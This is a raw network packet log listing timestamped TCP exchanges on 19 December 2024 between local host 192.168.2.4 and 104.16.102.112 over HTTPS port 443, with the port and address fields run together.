                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.859404087 CET49762443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.860970020 CET49762443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.860997915 CET44349762104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.861293077 CET49771443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.861335039 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.861387968 CET49771443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.861938953 CET49771443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.861953020 CET44349771104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.881561995 CET44349765104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.881668091 CET44349765104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.881704092 CET44349765104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.881715059 CET49765443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.881752968 CET44349765104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.881825924 CET49765443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.881834984 CET44349765104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.881850958 CET44349765104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.881885052 CET49765443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.883243084 CET49765443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.883268118 CET44349765104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.890968084 CET44349763104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.891043901 CET44349763104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.891083002 CET49763443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.891094923 CET44349763104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.891177893 CET44349763104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.891216040 CET49763443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.891222000 CET44349763104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.891242027 CET44349763104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.891289949 CET49763443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.892497063 CET49763443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.892518997 CET44349763104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.895728111 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.897083998 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.897161007 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.897207022 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.897232056 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.897572041 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.897614956 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.897622108 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.905734062 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.905792952 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.905810118 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.907522917 CET49772443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.907601118 CET44349772104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.907672882 CET49772443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.908560991 CET49772443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.908610106 CET44349772104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.913364887 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.913441896 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.913479090 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.913512945 CET49767443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.913551092 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.913597107 CET49767443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.913678885 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.913716078 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.913750887 CET49767443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.913759947 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.914443970 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.914514065 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.914526939 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.916100979 CET44349766104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.916188955 CET44349766104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.916227102 CET44349766104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.916275024 CET44349766104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.916271925 CET49766443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.916310072 CET44349766104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.916327000 CET49766443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.919610023 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.920860052 CET44349766104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.920907974 CET49766443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.920917034 CET44349766104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.921778917 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.921824932 CET49767443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.921849012 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.924782991 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.924837112 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.924848080 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.928988934 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.929040909 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.929049969 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.929074049 CET44349766104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.929162025 CET49766443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.929167986 CET44349766104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.932746887 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.932801008 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.932810068 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.934758902 CET44349768104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.934844971 CET44349768104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.934890985 CET49768443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.934916973 CET44349768104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.935034037 CET44349768104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.935075045 CET49768443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.936283112 CET49768443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.936299086 CET44349768104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.938446045 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.938491106 CET49767443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.938514948 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.939729929 CET49773443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.939795971 CET44349773104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.939879894 CET49773443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.940371037 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.940396070 CET49773443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.940421104 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.940428972 CET44349773104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.940447092 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.948420048 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.948474884 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.948484898 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.956163883 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.956214905 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.956226110 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.964252949 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.964301109 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.964308977 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.969749928 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.969772100 CET49766443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.969784021 CET44349766104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.971877098 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.971929073 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.971936941 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.979484081 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.979599953 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.979609013 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.985064030 CET49767443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.993742943 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.993793011 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.993808031 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.000179052 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.000238895 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.000252008 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.006725073 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.006781101 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.006791115 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.016731977 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.017694950 CET49766443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.033119917 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.036218882 CET44349766104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.039346933 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.039448977 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.039460897 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.039902925 CET44349766104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.039956093 CET49766443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.039968967 CET44349766104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.067913055 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.070158958 CET44349769104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.070241928 CET44349769104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.070270061 CET44349769104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.070287943 CET49769443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.070305109 CET44349769104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.070338011 CET49769443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.070344925 CET44349769104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.082896948 CET49766443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.082920074 CET49767443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.082997084 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.083039045 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.113735914 CET49769443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.113749981 CET44349769104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.130767107 CET49767443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.161504984 CET49769443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.189547062 CET44349769104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.190376043 CET44349769104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.190397024 CET44349769104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.190416098 CET49769443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.190431118 CET44349769104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.190466881 CET49769443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.309124947 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.309181929 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.309232950 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.309262991 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.350568056 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.350603104 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.396699905 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.428514957 CET44349769104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.428531885 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.428812981 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.429172039 CET44349766104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.429466963 CET44349766104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.429529905 CET49766443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.429696083 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.429697990 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.429723978 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.429748058 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.429753065 CET49767443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.429759979 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.429811954 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.429816961 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.430706024 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.430905104 CET49766443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.430919886 CET44349766104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.431303978 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.431355000 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.431411028 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.431436062 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.432095051 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.432121992 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.432156086 CET49767443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.432176113 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.432197094 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.432226896 CET49767443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.432254076 CET49767443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.433784008 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.433835030 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.433840990 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.433854103 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.433876038 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.433903933 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.433912992 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.433928967 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.434560061 CET49774443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.434590101 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.434591055 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.434634924 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.434640884 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.434652090 CET44349774104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.434668064 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.434674978 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.434739113 CET49774443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.434740067 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.434978962 CET49774443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.435014009 CET44349774104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.435483932 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.435503960 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.435538054 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.436216116 CET49767443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.436247110 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.436328888 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.436369896 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.436376095 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.437088013 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.437139988 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.437145948 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.437925100 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.437997103 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.438004971 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.438044071 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.438194036 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.438254118 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.438937902 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.438994884 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.439001083 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.439781904 CET49741443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.439811945 CET44349741104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.439837933 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.439923048 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.440551043 CET49775443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.440644026 CET44349775104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.440722942 CET49775443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.440970898 CET49775443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.441006899 CET44349775104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.441457987 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.441483974 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.441514015 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.441514015 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.441521883 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.441577911 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.441579103 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.442291975 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.443167925 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.443253040 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.443876982 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.443924904 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.443931103 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.443938017 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.443984032 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.444801092 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.444879055 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.445583105 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:28.445646048 CET49761443192.168.2.4104.16.102.112
